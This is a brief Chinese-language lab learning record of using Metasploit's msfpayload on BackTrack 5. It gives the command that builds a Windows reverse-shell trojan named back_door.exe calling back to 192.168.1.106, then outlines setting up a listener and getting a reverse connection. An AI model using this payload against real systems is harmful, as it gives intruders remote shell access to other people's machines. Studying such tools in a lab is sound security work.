0x00 前言
这是我对 msf攻击载荷生成器的学习记录。
0x01 拓扑结构
0x02 过程
1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程
1.1 显示msfpayload命令的使用方法:msfpayload -h
1.2显示msfpayload支持的全面载荷:msfpayload -l
1.3显示windows/shell_reverse_tcp这个payload需要设置的参数:msfpayload windows/shell_reverse_tcp O
1.4设置反弹连接的地址为IP(BackTrack 5),“X”参数表示生成可执行文件,可执行文件名为back_door.exe,该文件在当前目录下: msfpayload windows/shell_reverse_tcp LHOST=192.168.1.106 X >back_door.exe
1.5使用命令ls显示当前目录
1.6拷贝该可执行文件到服务端计算机上
2. 启动metasploit
1.7在执行该可执行文件前,架设监听的服务器,启动metasploit
1.8启用模块
1.9设置payload
1.10查看选项
1.11设置选项
1.12 exploit
1.13在服务端计算机上执行文件
1.14成功建立反弹连接